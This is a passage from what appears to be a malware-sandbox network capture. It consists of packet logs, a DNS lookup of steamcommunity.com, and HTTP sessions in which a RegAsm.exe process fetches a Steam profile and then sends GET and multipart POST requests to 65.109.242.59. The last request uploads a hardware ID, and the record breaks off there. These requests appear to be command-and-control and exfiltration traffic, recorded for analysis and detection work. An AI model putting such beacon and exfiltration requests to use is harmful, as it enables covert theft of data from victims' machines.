                                                                                  May 24, 2024 17:47:19.214656115 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.214682102 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.214817047 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.214840889 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.215054989 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.222740889 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.222755909 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.222882032 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.222892046 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.222935915 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.241182089 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.241199970 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.241437912 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.241461992 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.241511106 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.246293068 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.246308088 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.246396065 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.246419907 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.246462107 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.256324053 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.256340027 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.256423950 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.256448030 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.256582975 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.267729998 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.267745972 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.267822027 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.267848015 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.267888069 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.285315037 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.285336018 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.285478115 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.285504103 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.285550117 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.289186001 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.289206028 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.289341927 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.289366007 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.289446115 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.302608967 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.302628040 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.302716970 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.302741051 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.302788973 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.313777924 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.313796997 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.313893080 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.313899040 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.313942909 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.332107067 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.332124949 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.332197905 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.332204103 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.332246065 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.337276936 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.337295055 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.337372065 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.337388992 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.337440014 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.351413965 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.351437092 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.351577997 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.351586103 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.351694107 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.359853029 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.359869957 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.359930038 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.359935045 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.359976053 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.376228094 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.376245022 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.376310110 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.376317978 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.376359940 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.379950047 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.379966974 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.380039930 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.380060911 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.380100012 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.393482924 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.393501043 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.393558025 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.393582106 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.393621922 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.404891968 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.404908895 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.404943943 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:19.404968023 CEST4434973165.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:19.404984951 CEST49731443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.383893013 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.384016037 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.384036064 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.384092093 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.403738976 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.403758049 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.403867006 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.403877020 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.403923988 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.412223101 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.412239075 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.412352085 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.412360907 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.412405014 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.424271107 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.424299002 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.424441099 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.424449921 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.424490929 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.428170919 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.428260088 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.428287029 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.428314924 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.428653955 CEST49732443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.428673029 CEST4434973265.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.459062099 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.459100008 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:21.459196091 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.459430933 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:21.459448099 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.150717974 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.150784969 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.151633978 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.151642084 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.151921988 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.151926994 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.620882988 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.620913029 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.620930910 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.620954037 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.620994091 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.621005058 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.621071100 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.648772001 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648793936 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648884058 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.648902893 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.648948908 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.723330021 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723360062 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723481894 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.723517895 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.723567963 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.765505075 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765536070 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765713930 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.765733957 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.765784025 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.800698996 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800756931 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800812006 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.800822020 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.800879955 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.802318096 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.802362919 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.802395105 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:22.802439928 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.970873117 CEST49733443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:22.970901012 CEST4434973365.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.133698940 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.133784056 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.133877993 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.134109020 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.134149075 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.810312986 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.810460091 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811048985 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811062098 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.811280966 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811286926 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:23.811326981 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:23.811331987 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.511550903 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511584044 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.511653900 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511914015 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.511929035 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744446039 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744539022 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:24.744612932 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.745609999 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:24.745609999 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.049396992 CEST49734443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.049412012 CEST4434973465.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.211430073 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.211522102 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349096060 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349112034 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.349571943 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.349577904 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947349072 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947407007 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947552919 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:25.947664022 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:25.947664022 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.046905041 CEST49736443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.046933889 CEST4434973665.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.049926043 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.049949884 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.050029039 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.050381899 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.050399065 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.788935900 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.789717913 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.797816038 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.797823906 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:26.798054934 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:26.798060894 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543191910 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543276072 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.543277025 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543330908 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543484926 CEST49737443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.543505907 CEST4434973765.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.559950113 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.559978962 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:27.560055017 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.560254097 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:27.560265064 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.288130045 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.288229942 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.288983107 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.288995028 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:28.289186954 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:28.289192915 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061043978 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061129093 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.061203957 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.061203957 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.062495947 CEST49738443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.062517881 CEST4434973865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.607656002 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.607703924 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:29.607933044 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.608144999 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:29.608159065 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.325531006 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.325587034 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326253891 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326277971 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326425076 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326436043 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326570034 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326598883 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326726913 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326736927 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326787949 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326808929 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326834917 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326850891 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.326875925 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.326884031 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327100039 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327106953 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327198982 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327208996 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:30.327223063 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:30.327224970 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633507013 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633589983 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633596897 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.633646011 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633929014 CEST49739443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.633955002 CEST4434973965.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.638637066 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.638672113 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:31.638780117 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.639020920 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:31.639034986 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.416486025 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.416557074 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:32.417078018 CEST49740443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:32.417088032 CEST4434974065.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:32.417319059 CEST49740443192.168.2.665.109.242.59
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 24, 2024 17:46:54.560937881 CEST | 59142 | 53 | 192.168.2.6 | 1.1.1.1
May 24, 2024 17:46:54.568561077 CEST | 53 | 59142 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 24, 2024 17:46:54.560937881 CEST | 192.168.2.6 | 1.1.1.1 | 0x4a26 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 24, 2024 17:46:54.568561077 CEST | 1.1.1.1 | 192.168.2.6 | 0x4a26 | No error (0) | steamcommunity.com | | 104.102.42.29 | A (IP address) | IN (0x0001) | false
                                                                                  • steamcommunity.com
                                                                                  • 65.109.242.59
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 104.102.42.29 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:46:55 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:46:56 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Date: Fri, 24 May 2024 15:46:55 GMT
                                                                                  Content-Length: 35682
                                                                                  Connection: close
                                                                                  Set-Cookie: sessionid=7ea970eac3bd0af52973f684; Path=/; Secure; SameSite=None
                                                                                  Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
2024-05-24 15:46:56 UTC | 14502 | IN
                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-24 15:46:56 UTC | 16384 | IN
                                                                                  Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
2024-05-24 15:46:56 UTC | 3768 | IN
                                                                                  Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
2024-05-24 15:46:56 UTC | 1028 | IN
                                                                                  Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49711 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:46:57 UTC | 186 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:46:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 15:46:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 15:46:57 UTC | 5 | IN
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 15:46:58 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 15:46:58 UTC | 279 | OUT
Data Ascii:
------AAKKFHCFIECAAAKEGCFI
Content-Disposition: form-data; name="hwid"

9BF78A37800C3886582548-a33c7340-61ca-11ee-8c18-806e6f6e6963
